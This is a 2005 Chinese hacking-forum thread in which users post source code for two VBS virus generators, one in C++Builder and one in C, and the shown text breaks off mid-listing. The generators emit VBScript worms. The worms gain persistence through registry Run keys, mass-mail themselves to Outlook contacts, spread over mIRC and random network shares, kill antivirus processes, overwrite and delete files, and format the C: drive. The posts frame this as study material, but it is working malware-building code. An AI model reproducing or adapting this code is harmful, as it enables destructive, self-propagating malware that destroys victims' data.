[转载]VBS病毒生成器核心源代码此程序可以生成病毒(页 1) - 开源代码收集{ Software Source Code } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

冰血封情 2005-6-11 04:40

[转载]VBS病毒生成器核心源代码此程序可以生成病毒

信息来源：邪恶八进制信息安全团队

该程序来源于网络上，是我们收集来供大家研究交流，根据作者说：
程序经过加壳压缩后仅200来K，但由于窗口文件较多，所以文件比较杂乱，所以把核心文件整理出来，供大家参考。其中注册功能未公开实属无奈之举，有看不懂的问题可以向[email]zsy2@citiz.net[/email]来信询问。

以下程序在windows ME用C++Builder5.0编译通过。欢迎和高手一起探讨开发，不得将下列代码在媒体发表。
　

unit1.cpp

//-----------------------------------------
#include
#include
#include
#pragma hdrstop
#include "Unit2.h"
#include "Unit3.h"
#include "Unit1.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
Tform1 *form1;
//---------------------------------------------------------------------------
__fastcall Tform1::Tform1(TComponent* Owner)
: Tform(Owner)

{

}//---------------------------------------------------------------------------

//---------------------------------------------------------------------------
void __fastcall Tform1::Label1Click(TObject *Sender)
{
ShellExecute(Handle,NULL,"[url]http://zsyangel.yeah.net[/url]",NULL,NULL,SW_SHOWNORMAL);
}
//---------------------------------------------------------------------------

//--------------------------------------------------------

void __fastcall Tform1::CheckBox3Click(TObject *Sender)
{
if (CheckBox3->Checked==true)
{
Edit8-> Enabled=true;
Edit8->Color=clHighlightText;
Edit9-> Enabled=true;
Edit9->Color=clHighlightText;
Edit10-> Enabled=true;
Edit10->Color=clHighlightText;}
else
{Edit8-> Enabled=false;
Edit8->Color=clBtnFace;
Edit9-> Enabled=false;
Edit9->Color=clBtnFace;
Edit10-> Enabled=false;
Edit10->Color=clBtnFace;}
}
//--------下面数行用来限制按健，防止无效数据，造成溢出-------------------------------------------------------------------

void __fastcall Tform1::CheckBox4Click(TObject *Sender)
{
if(Edit4->Enabled==true)
{Edit4->Enabled=false;}
else
{Edit4->Enabled=true;}

}
//---------------------------------------------------------------------------

//---------------------------------------------------------------------------

void __fastcall Tform1::Edit4KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit8KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit9KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit10KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit5KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit4Exit(TObject *Sender)
{
AnsiString edit4=Edit4->Text;
if (StrToInt (edit4)<1||StrToInt (edit4)>10000)
{ ShowMessage("超出范围，请不要添太大或太小");
Edit4->Text="";}
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit8Exit(TObject *Sender)
{

AnsiString edit8=Edit8->Text;
if (StrToInt (edit8)<1982||StrToInt (edit8)>2050)
{ ShowMessage("超出范围，请不要添太大或太小");
Edit8->Text="2001";}
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit9Exit(TObject *Sender)
{

AnsiString edit9=Edit9->Text;
if (StrToInt (edit9)<1||StrToInt (edit9)>12)
{ ShowMessage("超出范围，请不要添太大或太小");
Edit9->Text="1";}
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit10Exit(TObject *Sender)
{

AnsiString edit10=Edit10->Text;
if (StrToInt (edit10)<1||StrToInt (edit10)>31)
{ ShowMessage("超出范围，请不要添太大或太小");
Edit10->Text="1";}
}
//---------------------------------------------------------------------------

//---------------主要代码------------------------------------------------------------

void __fastcall Tform1::BitBtn1Click(TObject *Sender)
{
AnsiString g=Edit1->Text+".vbe";//在当前目录下生成VBE文件

i=FileCreate(g );
AnsiString a1=""Created by " ;
AnsiString a=Edit2->Text;
AnsiString b="\r\n";
AnsiString z=a1+a+b;
char c[1000];
strcpy(c, z.c_str());

FileWrite(i,c,strlen(c));

if (CheckBox1->Checked==true)//让病毒修改注册表项
{AnsiString a3=" Dim wsh\r\n Set wsh=CreateObject(\"WScript.Shell\")\r\n on error resume next \r\n wsh.regwrite \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\kv3000\",\"c:\\windows\\";
AnsiString a31=Edit1->Text;
AnsiString a32=".vbe\"\r\n";
AnsiString a33="Set fso= Createobject$\"Scripting.FileSystemObject\"$\r\nSet InF=fso.OpenTextFile$WScript.ScriptFullname,1$\r\nDo While InF.AtEndOfStream<>True\r\nScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf \r\nLoop\r\nSet OutF=fso.OpenTextFile$\"c:\\windows\\";
AnsiString a34=Edit1->Text;
AnsiString a35=".vbe\",2,true$\r\nOutF.write ScriptBuffer\r\n ";
AnsiString a4=a3+a31+a32+a33+a34+a35;
char c1[10000];
strcpy(c1, a4.c_str());
FileWrite(i,c1,strlen(c1));
}

TabSheet1->Enabled=true;
TabSheet1->Show() ;
TabSheet0->Enabled=false;
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Label4Click(TObject *Sender)
{
ShellExecute(Handle,"open","mailto:zsy2@citiz.net",NULL,NULL,SW_SHOW);
}
//---------------------------------------------------------------------------

void __fastcall Tform1::BitBtn2Click(TObject *Sender)//此几行代码负责病毒从outlook传播
{
AnsiString bb="if wsh.regread $\"HKCU\\software\\a\\a\"$<> \"1\" then out\r\nsub out\r\n";
AnsiString b1="On Error Resume Next\r\n";
AnsiString b2="Set Outlook = CreateObject(\"Outlook.Application\")\r\nIf Outlook = \"Outlook\" Then\r\nSet Mapi=Outlook.GetNameSpace(\"MAPI\")\r\nSet Lists=Mapi.AddressLists\r\nFor Each ListIndex In Lists\r\nIf ListIndex.AddressEntries.Count <> 0 Then\r\nContactCount = ListIndex.AddressEntries.Count\r\nFor Count= 1 To ";
AnsiString b9="ContactCount";
AnsiString b7= Edit4->Text;
AnsiString b8="\r\nSet Mail = Outlook.CreateItem(0)\r\nSet Contact = ListIndex.AddressEntries(Count)\r\nMail.To = Contact.Address\r\nMail.Subject = \"";
AnsiString b3=Edit11->Text;
AnsiString b4="\"\r\nMail.Body = \"" ;
AnsiString b5=Edit13->Text;
AnsiString b6="\"\r\nSet Attachment=Mail.Attachments\r\n Attachment.Add Folder & \" c:\\windows\\";
AnsiString bb1=Edit1->Text;
AnsiString bb2=".vbe\"\r\nMail.Send\r\nnext\r\n End if\r\nnext\r\n End if\r\nend sub\r\nwsh.regwrite \"HKCU\\software\\a\\a\", \"1\"\r\n";

if (CheckBox4->Checked==true)
{
AnsiString B=bb+b1+b2+b9+b8+b3+b4+b5+b6+bb1+bb2;
char b[10000];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));
}
else
{AnsiString B=bb+b1+b2+b7+b8+b3+b4+b5+b6+bb1+bb2;
char b[10000];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));}

TabSheet2->Enabled=true;
TabSheet2->Show() ;
TabSheet1->Enabled=false;
}
//------------------------此下代码负责破坏功能---------------------------------------------------

void __fastcall Tform1::BitBtn3Click(TObject *Sender)
{
TabSheet3->Enabled=true;
TabSheet3->Show() ;
if (CheckBox3->Checked==true)
{{AnsiString d1=" \r\nif year(date)&month(date)&day(date)= ";//设定病毒发作时间
AnsiString dyear=Edit8->Text;
AnsiString dmon_th=Edit9->Text;
AnsiString dday=Edit10->Text;
AnsiString dthen=" Then a\r\n" ;
AnsiString sub="sub a\r\n" ;
AnsiString dex=d1+dyear+dmonth+dday+dthen+sub;
char d[10000];
strcpy(d, dex.c_str());
FileWrite(i,d,strlen(d)); }
AnsiString del="on error resume next\r\nfso.DeleteFile$\"";//负责删除指定文件
AnsiString delf=Edit6->Text;
AnsiString delf1="\"$\r\n";
AnsiString def=del+delf+delf1;
char d[10000];
strcpy(d, def.c_str());
FileWrite(i,d,strlen(d));
if(CheckBox2->Checked==true)//格式化硬盘
{AnsiString df1="\r\n set WshShell = Wscript.CreateObject$\"WScript.Shell\"$ \r\nWshShell.Run\ (\"start.exe \/m format c:\/q\ /autotest\ /u\" \)\r\n ";

char df[10000];
strcpy(df, df1.c_str());
FileWrite(i,df,strlen(df)); }
if(CheckBox5->Checked==true)
{AnsiString df2="Set Script = fso.CreateTextFile$ \"c:\\autoexec.bat\", True$ \r\nScript.writeline \"format c:\/q\ /autotest\ /u\" \r\n ";
char df3[10000];
strcpy(df3, df2.c_str());
FileWrite(i,df3,strlen(df3)); }
if(CheckBox6->Checked==true)
{AnsiString dem="Set Outlook=CreateObject$\"Outlook.Application\"$\r\nSet t=s.GetNameSpace$\"MAPI\"$\r\nSet u=t.GetDefaultFolder$6$\r\nFor i=1 to u.items.count\r\nu.Items.Item$i$.delete\r\nnext\r\n";
char dm[10000];
strcpy(dm, dem.c_str());
FileWrite(i,dm,strlen(dm));}
char endsub[]="end sub\r\n";
FileWrite(i,endsub,strlen(endsub));
}
else
{if(CheckBox2->Checked==true)
{AnsiString df1="set WshShell = Wscript.CreateObject$\"WScript.Shell\"$\r\nWshShell.Run\ (\"start.exe \/m format c:\/q\ /autotest\ /u\" \)\r\n";

char df[10000];
strcpy(df, df1.c_str());
FileWrite(i,df,strlen(df)); }
if(CheckBox5->Checked==true)
{AnsiString df2="on error resume next\r\nfso.DeleteFile$\"c:\\autoexec.bat\")\r\n\Set Script = fso.CreateTextFile\( \"c:\\autoexec.bat\", True$\r\nScript.writeline \"format c:\/q\ /autotest\ /u\"\r\n";

char df3[10000];
strcpy(df3, df2.c_str());
FileWrite(i,df3,strlen(df3)); }}
AnsiString del="on error resume next\r\nfso.DeleteFile$\"";
AnsiString delf=Edit6->Text;
AnsiString delf1="\"$\r\n";
AnsiString def=del+delf+delf1;
char d[10000];
strcpy(d, def.c_str());
FileWrite(i,d,strlen(d));
if(CheckBox6->Checked==true)
{AnsiString dem="Set Outlook=CreateObject$\"Outlook.Application\"$\r\nSet t=s.GetNameSpace$\"MAPI\"$\r\nSet u=t.GetDefaultFolder$6$\r\nFor i=1 to u.items.count\r\nu.Items.Item$i$.delete\r\nnext\r\n";
char dm[10000];
strcpy(dm, dem.c_str());
FileWrite(i,dm,strlen(dm));}
TabSheet2->Enabled=false;
}
//---------------------------------------------------------------------------

void __fastcall Tform1::BitBtn4Click(TObject *Sender)//修改IE的标题开始页
{
AnsiString reg="wsh.regwrite \"HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page\",\"" ;
AnsiString reg1=Edit3->Text;
AnsiString reg2="\"\r\nwsh.regwrite\"HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Window title\",\"";
AnsiString reg3=Edit7->Text;
AnsiString reg4="\"\r\n";
AnsiString reg5=reg+reg1+reg2+reg3+reg4+reg5;
char REG[10000];
strcpy(REG, reg5.c_str());
FileWrite(i,REG,strlen(REG));
TabSheet3->Enabled=false;
ShowMessage("你的程序代码已保存在当前目录下");

FileClose(i);
}
//---------------------------------------------------------------------------

//注册功能暂不公开，敬请原谅……

//---------------------------------------------------------------------------

void __fastcall Tform1::formClose(TObject *Sender, TCloseAction &Action)
{
form2->Close();
}
//---------------------------------------------------------------------------

void __fastcall Tform1::formActivate(TObject *Sender)
{
form2->Hide();
}
//---------------------------------------------------------------------------

void __fastcall Tform1::BitBtn5Click(TObject *Sender)
{

AnsiString g=Edit1->Text+".vbe";
DeleteFile(g);
TabSheet0->Enabled=true;
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Button1Click(TObject *Sender)
{
form3->Show();
}
//---------------------------------------------------------------------------

void __fastcall Tform1::TabSheet0ContextPopup(TObject *Sender,
TPoint &MousePos, bool &Handled)
{

}

unit1.h

　

#ifndef Unit1H
#define Unit1H
//---------------------------------------------------------------------------
#include
#include
#include
#include
#include
#include
#include
#include
//---------------------------------------------------------------------------
class Tform1 : public Tform
{
__published: // IDE-managed Components
TPageControl *b;
TTabSheet *TabSheet2;
TTabSheet *TabSheet3;
TTabSheet *TabSheet4;
TGroupBox *GroupBox1;
TLabel *Label1;
TMemo *Memo1;
TCheckBox *CheckBox1;
TEdit *Edit1;
TLabel *Label2;
TCheckBox *CheckBox2;
TEdit *Edit2;
TLabel *Label3;
TEdit *Edit3;
TTabSheet *TabSheet1;
TEdit *Edit4;
TLabel *Label5;
TLabel *Label6;
TLabel *Label8;
TEdit *Edit6;
TLabel *Label10;
TLabel *Label11;
TEdit *Edit7;
TEdit *Edit11;
TLabel *Label15;
TLabel *Label16;
TCheckBox *CheckBox3;
TEdit *Edit8;
TLabel *Label12;
TEdit *Edit9;
TLabel *Label13;
TEdit *Edit10;
TLabel *Label14;
TEdit *Edit13;
TCheckBox *CheckBox4;
TGroupBox *GroupBox2;
TLabel *Label7;
TCheckBox *CheckBox5;
TCheckBox *CheckBox6;
TBitBtn *BitBtn1;
TBitBtn *BitBtn2;
TBitBtn *BitBtn3;
TBitBtn *BitBtn4;
TTabSheet *TabSheet0;
TLabel *Label4;
TGroupBox *GroupBox3;
TCheckBox *CheckBox7;
TCheckBox *CheckBox8;
TCheckBox *CheckBox9;
TCheckBox *CheckBox10;
TCheckBox *CheckBox11;
TEdit *Edit5;
TGroupBox *GroupBox4;
TLabel *Label9;
TCheckBox *CheckBox12;
TButton *Button1;
TBitBtn *BitBtn5;
TCheckBox *CheckBox13;
TGroupBox *GroupBox5;
TCheckBox *CheckBox14;
TCheckBox *CheckBox15;
TCheckBox *CheckBox16;
TImage *Image1;
TLabel *Label17;
TImage *Image2;

void __fastcall Label1Click(TObject *Sender);
void __fastcall CheckBox3Click(TObject *Sender);
void __fastcall CheckBox4Click(TObject *Sender);
void __fastcall Edit4KeyPress(TObject *Sender, char &Key);
void __fastcall Edit8KeyPress(TObject *Sender, char &Key);
void __fastcall Edit9KeyPress(TObject *Sender, char &Key);
void __fastcall Edit10KeyPress(TObject *Sender, char &Key);
void __fastcall Edit5KeyPress(TObject *Sender, char &Key);
void __fastcall Edit4Exit(TObject *Sender);
void __fastcall Edit8Exit(TObject *Sender);
void __fastcall Edit9Exit(TObject *Sender);
void __fastcall Edit10Exit(TObject *Sender);
void __fastcall BitBtn1Click(TObject *Sender);
void __fastcall Label4Click(TObject *Sender);
void __fastcall BitBtn2Click(TObject *Sender);
void __fastcall BitBtn3Click(TObject *Sender);
void __fastcall BitBtn4Click(TObject *Sender);
void __fastcall formClose(TObject *Sender, TCloseAction &Action);
void __fastcall formActivate(TObject *Sender);
void __fastcall BitBtn5Click(TObject *Sender);
void __fastcall Button1Click(TObject *Sender);
void __fastcall TabSheet0ContextPopup(TObject *Sender,
TPoint &MousePos, bool &Handled);

private: // User declarations
public: // User declarations
__fastcall Tform1(TComponent* Owner);

int i;
AnsiString B;

};
//---------------------------------------------------------------------------
extern PACKAGE Tform1 *form1;
//---------------------------------------------------------------------------
#endif

sgl 2005-6-29 12:45

我垃圾时的一个作品

用c写的脚本病毒制造机

这是我学编程不到两个月的练习题，用它可以批量的生产脚本病毒，注意：生成病毒之后，最好不要在本机上运行，除非你很了解病毒的工作流程，请大家最好不要用蠕虫功能模块，否则会向网络大量感染主机。提供原代码知识让大家知道脚本病毒机是很容易写的,并且那个完整的病毒也是我自己写的，虽然从代码编写的效率和美感上都很欠缺，但敢保证这比起网络上那些到处传播的病毒制造机要强许多（国内那些家伙写的东西，我都用过），大家看看，其实脚本病毒制造机就是这么简单容易写的，是我自学完文件操作后的课后练习，拿来献丑了，高手不用耽误时间了

#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#define exit_success 0
#define again 1
#define m 4

int make();
int care();
void password(void);
void out(void);

main()
{
char choose;
clrscr();
printf("*******************************************************************************\n");
printf("This is a VBS virus made machine,it's only used to study,don't used to destory.\n");
printf("                   Programmed by W.Z.T\n");
printf("                   Version 0.1\n");
printf("*******************************************************************************\n");
puts("\n\t1--Strat Make\t\t2--View Help\t\t3--Exit");
while(again)
{
printf("choice:");
scanf("%c",&choose);
switch(choose)
{
case'1':
{
make();
clrscr();
return 0;
}
case'2':
{
clrscr();
puts("I like Virus,so i write a machine which anybody can make a Virus much easiler.\n");
puts("This Version is my first one,i will try to write a better one later.\n");
out();
}
case'3':
{
exit(exit_success);
}
default:
{
puts("choice 1,2 or 3");
}
}
}
}

void out(void)
{
printf("\npause");
getch();
main();
}

void password(void)
{
int i,j,y=0;
char pwd[11+1],pass[]="wangzhitong";
fflush(stdin);
printf("If you want to use this function,please input the password.\n");
for(j=0;;)
{
   if((pwd[j]=getch())==13)
   {
  pwd[j]='\0';
  break;
   }
   else if(pwd[j]==8)
   {
  if(y!=0)
  {
printf("\b");
y--;
j--;
  }
  putchar(0);
  printf("\b");
   }
   else if(j==11)
continue;
   else
   {
printf("*");
y++;
j++;
   }
  }
  if(strcmp(pwd,pass)==0)
  {
   printf("\ndone.\n");
  }
  else
  {
   printf("password error.\n");
  }
}

int make()
{
FILE *fp,*fp1;
int i,j,aa,bb,cc,dd,ee,ff,gg,hh,jjj,kkk,lll,y=0,word=0,number=0;
char ch,w[5],*vc=w;
char subject[200],*sub=subject;
char body[400],*bo=body;
char string[100],*pop=string;
char road[100],name2[40],road2[100],time[20],web[100];
char pwd[11+1],pass[]="wangzhitong";
char *ext1[27]={"txt","vbs","vbe","html","htm","bak","dll","pfg","ppl","c","bin","sig","vdb","dat","doc","xls","tsk","tmp","vdb","vlg","dsc","ptn","set","log","cfg","idx","rec"};
char **pl=ext1;
char str1[25][100]={"(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\"","(ext=\""};
char str2[]="\") or";
char *str[27],**pa=str;
char *a="\non error resume next\nset fso=createobject(\"scripting.filesystemobject\")\nset a=createobject(\"wscript.shell\")\nset dir1=fso.getspecialfolder(0)\nset dir2=fso.getspecialfolder(1)\nset k=fso.getfile(wscript.scriptfullname)\n";
char *b="k.copy(dir2&\"\\system.vbe\")\n";
char *c="k.copy(dir1&\"\\windows.vbe\")\n";
char *d="set ag=fso.createtextfile(dir1&\"\kill.vbe\")\nag.writeline \"on error resume next\"\nag.writeline \"do\"\nag.writeline \"strComputer=\"\".\"\"\"\n";
char *e="ag.writeline \"set objWMIService=GetObject(\"\"winmgmts:\"\" & \"\"{impersonationLevel=impersonate}!\\\\\"\" & strComputer & \"\"\\root\\cimv2\"\")\"\n";
char *f="ag.writeline \"fv=Array(\"\"notepad.exe\"\",\"\"pccguide.exe\"\",\"\"pccclient.exe\"\",\"\"rfw.exe\"\",\"\"davpfw.exe\"\",\"\"vpc32.exe\"\",\"\"ravmon.exe\"\")\"\n";
char *g="ag.writeline \"for Each fa in fv\"\nag.writeline \"Set colProcessList=objWMIService.ExecQuery (\"\"Select * from Win32_Process Where Name=\'\"\"&fa&\"\"\'\"\")\"\nag.writeline \"For Each objProcess in colProcessList\"\n";
char *h="ag.writeline \"objProcess.Terminate()\"\nag.writeline \"Next\"\nag.writeline \"next\"\nag.writeline \"loop\"\nag.close\na.run fso.getspecialfolder(0) & \"\\kill.vbe\"\nset ai=fso.getfile(dir1&\"\\kill.vbe\")\n";
char *ii="ai.attributes=ai.attributes+2\n";
char *jj="set cc=fso.createtextfile(dir1&\"\\Run.bat\")\ncc.writeline \"@echo off\"\ncc.writeline \"cls\"\ncc.writeline \"echo       %date% %time%\"\ncc.writeline \"echo Chinese hacker is the best!\"\n";
char *k="cc.writeline \"prompt $P$G$$$_*[email]tthacker@eyou.com[/email]*\"\ncc.writeline \"echo on\"\ncc.close\nset at=fso.getfile(dir1&\"\\Run.bat\")\nat.attributes=at.attributes+2\n";
char *l="set sii=fso.createtextfile(dir2&\"\\event.ini\")\nsii.writeline \"[Levels]\"\nsii.writeline \"Enabled=1\"\nsii.writeline \"Count=6\"\nsii.writeline \"Level1=000-Unknowns\"\nsii.writeline \"000-UnknownsEnabled=1\"\n";
char *mm="sii.writeline \"Level2=100-Level 100\"\nsii.writeline \"100-Level 100Enabled=1\"\nsii.writeline \"Level3=200-Level 200\"\nsii.writeline \"200-Level 200Enabled=1\"\n";
char *nn="sii.writeline \"Level4=300-Level 300\"\nsii.writeline \"300-Level 300Enabled=1\"\nsii.writeline \"Level5=400-Level 400\"\nsii.writeline \"400-Level 400Enabled=1\"\n";
char *oo="sii.writeline \"Level6=500-Level 500\"\nsii.writeline \"500-Level 500Enabled=1\"\nsii.writeline \"\"\n";
char *pp="sii.writeline \"[000-Unknowns]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\nsii.writeline \"\"\n";
char *qq="sii.writeline \"[100-Level 100]\"\nsii.writeline \"User1=*!*@*\"\nsii.writeline \"UserCount=1\"\nsii.writeline \"Event1=ON JOIN:#:/dcc tsend $nick \" & fso.getspecialfolder(1) & \"\\system.vbe\"\nsii.writeline \"EventCount=1\"\n";
char *rr="sii.writeline \"\"\nsii.writeline \"[200-Level 200]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\nsii.writeline \"\"\n";
char *ss="sii.writeline \"[300-Level 300]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\nsii.writeline \"\"\nsii.writeline \"[400-Level 400]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\n";
char *tt="sii.writeline \"\"\nsii.writeline \"[500-Level 500]\"\nsii.writeline \"UserCount=0\"\nsii.writeline \"EventCount=0\"\nsii.close\nset wi=fso.getfile(dir2&\"\\event.ini\")\nwi.attributes=attributes+2\n";
char *uu="set rei=fso.createtextfile(dir1&\"\\check.vbe\")\nrei.writeline \"on error resume next\"\nrei.writeline \"dim bb,aa,cc\"\nrei.writeline \"set cc=createobject(\"\"wscript.shell\"\")\"\n";
char *vv="rei.writeline \"aa=minute(time)\"\nrei.writeline \"bb=aa\"\nrei.writeline \"do\"\nwei.writeline \"bb=minute(time)\"\nrei.writeline \"loop until aa>=bb+1\"\nrei.writeline \"cc.run \"\"system.vbe\"\"\"\nrei.close\n";
char *ww="a.run \"check.vbe\"\nset ahd=fso.getfile(dir1&\"\\check.vbe\")\nahd.attributes=attributes+2\nset ah=fso.getfile(dir2&\"\wscript.exe\")\nah.attributes=attritutes+2\n";
char *xx="set bh=fso.getfile(dir2&\"\\cscript.exe\")\nbh.attributes=attributes+2\nset apq=fso.createtextfile(dir2&\"\system.inf\")\napq.writeline \"[Autorun]\"\napq.writeline \"open=system.vbs\"\napq.close\n";
char *yy="set pr=fso.getfile(dir2&\"\\system.inf\")\npr.attributes=attributes+2\nkill()\nregruns()\nlistadriv()\njuyu()\nmail()\n";
char *kill1="sub kill()\nset fso=createobject(\"scripting.filesystemobject\")\nset aa=createobject(\"wscript.shell\")\nbb = \"";
char *kill2="vv = they(bb)\nset tt=fso.createtextfile(fso.getspecialfolder(0) & \"\\rav.exe\",true)\ntt.write vv\ntt.close\naa.run fso.getspecialfolder(0) & \"\\rav.exe\",1,false\ntehy(our)\nend sub\n";
char *kill3="Function they(our)\nFor mine=1 To Len(our) Step 2\nthey = they & Chr(\"&h\" & Mid(our,mine, 2))\nNext\nEnd Function\n";
char *reg1="sub regruns()\non error resume next\nset a=createobject(\"wscript.shell\")\nkj=\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\\"\nki=\"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\\"\n";
char *reg2="a.regwrite kj&\"Internet Settings\\NoNetAutodial\",01,\"REG_BINARY\"\na.run \"RUNDLL32.exe shell32,dll,SHExitWindowsEx2\"\na.run \"ping -1 6500 -t ";
char *reg3="a.regwrite kj&\"Policies\\System\\DisableRegistryTools\",\"00000001\",\"REG_DWORD\"\n";
char *reg4="a.regwrite kj&\"Policies\\Explorer\\NoFolderOptions\",\"00000001\",\"REG_DWORD\"\n";
char *reg5="a.regwrite kj&\"Policies\\Uninstall\\NoAddFromCDorFloppy\"\"00000001\",\"DWORD\"\n";
char *reg6="a.regwrite kj&\"Policies\\Uninstall\NoAddRemovePrograms\",\"00000001\",\"REG_DWORD\"\n";
char *reg7="a.regwrite kj&\"Policies\\Uninstall\NoAddRemovePage\",\"00000001\",\"REG_DWORD\"\n";
char *reg8="a.regwrite kj&\"Policies\\Explorer\\Advanced\\folder\\Hidden\\SHOWALL\\checkedValue\",\"00000001\",\"REG_DWORD\"\n";
char *reg9="a.regwrite \"HKLM\\Software\\CLASSES\\.reg\",\"txtfile\"\n";
char *reg10="a.regwrite \"HKLM\\Software\\Microsoft\\Command Processor\\AutoRun\",\"%systemroot%\\run.bat&system32.vbe\",\"REG_SZ\"\n";
char *reg11="a.retwrite \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\system\",dir1&\"\\windows.vbe\"\nend sub\n";
char *infect1="\nsub listadriv\non error resume next\ndim d,dc,s\nset dc=fso.drives\nfor each d in dc\nIf d.DriveType = 1 or d.DriveType = 2 or d.DriveType = 3 then\nfolderlist(d.path & \"\\\")\nend if\nnext\nlistadriv = s\nend sub\n";
char *infect2="\nsub infectfiles(folderspec)\non error resume next\ndim f,f1,fc,ext,ap,mircfname,s,bname,mp3,fso,file,si\neq=\"\"\n";
char *infect3="set fso=createobject(\"scripting.filesystemobject\")\nset file=fso.opentextfile(wscript.scriptfullname,1)\nvbscopy=file.readall\nset f=fso.getfolder(folderspec)\n";
char *infect4="set fc=f.files\nfor each f1 in fc\next=fso.getextensionname(f1.path)\next=lcase(ext)\ns=lcase(ext)\n";
char *infect5="set ap=fso.opentextfile(f1.path,2,true)\nap.write vbscopy\nap.close\nend if\nb=fso.getbasename(f1.path)\n";
char *infect6="if (b=\"patch\") or (b=\"Tmntsrv\") or (b=\"TSC\") then\n";
char *infect7="set gp=fso.getfile(f1.path)\ngp.delete\nend if\nif (eq<>folderspec) then\n";
char *infect8="if (dd=\"mirc32.exe\") or (dd=\"mlink32.exe\") or (dd=\"mirc.ini\") or (dd=\"script.ini\") or (dd=\"mirc.hlp\") then\n";
char *infect9="set si=fso.createtextfile(folderspec&\"\\script.ini\")\n";
char *infect10="si.writeline \"[script]\"\nsi.writeline \"n0=on 1:join:*.*:{if($nick!=$me){halt} /dcc send $nick c:\\winnt\\windows.vbe}\"\nsi.close\neq=folderspec\nend if\nend if\nnext\nend sub\n";
char *infect11="sub folderlist(folderspec)\non error resume next\ndim f,f1,sf\nset f=fso.getfolder(folderspec)\nset sf=f.subfolders\nfor each f1 in sf\ninfectfiles(f1.path)\nnext\nend sub\n";
char *infect12="sub regcreate(regkey,regvalue)\nset regedit = createobject(\"wscript.shell\")\nregedit.regwrite regkey,regvalue\nend sub\n\nfunction regget(value)\nset regedit=createobject(\"wscript.shell\")\nregget=regedit.regread(value)\n";
char *infect13="end function\n";
char *net1="sub juyu()\ndim octa,octb,octc,rand,dot,driveconnected,sharename,count\nset fso2=createobject(\"scripting.filesystemobject\")\ncount = \"0\"\ndot = \".\"\ndriveconnexted=\"0\"\nset run=createobject(\"wscript.shell\")\n";
char *net2="set wshnetwork= wscript.createobject(\"wscript.network\")\non error resume next\nrandomize\nrandaddress()\n";
char *net3="\ndo\ndo while driveconnexted=\"0\"\ncheckaddress()\nshareformat()\nwshnetwork.mapnetworkdrive \"j:\", sharename\nenumdrives()\nloop\ncopyfiles()\ndisconnectdrive()\nrun \"&sharename&\\con\\con\", 0\nloop\nend sub\n";
char *net4="\nfunction disconnectdrive()\nwshnetwork.removenetworkdrive \"j:\"\ndriveconnected=\"0\"\nend function\n";
char *net5="\nfunction copyfiles()\nfso2.copyfile dir2&\"\\system.vbe\",\"j:\\\"\nfso2.copyfile dir2&\"\\system.inf\",\"j:\\\"\nend function\n";
char *net6="\nfunction checkaddress()\noctd=octd+1\nif octd=\"255\" then randaddress()\nend function\n";
char *net7="\nfunction shareformat()\nsharename=\"\\\\\" & octa &dot & octb &dot & octc & dot & octd & \"\\C\"\nend function\n";
char *net8="\nfunction enumdrives()\nset odrives=wshnetwork.enumnetworkdrives\nfor i=0 to odrives.count -1\nif sharename=odrives.item(i) then\ndriveconnected = 1\nelse\ndriveconnected = 0\nend if\nnext\nend function\n";
char *net9="\nfunction randum()\nrand=int((254 *rnd)+1)\nend function\n";
char *net10="\nfunction randaddress()\nif count < 50 then\nocta=int((16) * rnd + 199)\ncount=count + 1\nelse\nrandum()\nocta=rand\nend if\nrandum()\noctb=rand\noctd=\"1\"\nend function\n";
char *mail1="function mail()\non error resume next\nset Outlook=createobject(\"Outlook.Appliction\")\nif Outlook=\"Outlook\" then\nset mapi=Outlook.GetNameSpace(\"MAPI\")\nset lists=mapi.AddressLists\nfor each listsIndex in lists\n";
char *mail2="if listIndex.AddressEntries.Count <> 0 then\nContactCount=listIndex.AddressEntries.Count\n";
char *mail3="for count=1 to ";
char *mail4="set mail=Outlook.CreateItem(0)\nset contact=listIndex.AddressEntries(count)\nmail.to=contact.Address\n";
char *mail5="mail.subject=\"";
char *mail6="mail.body=\"";
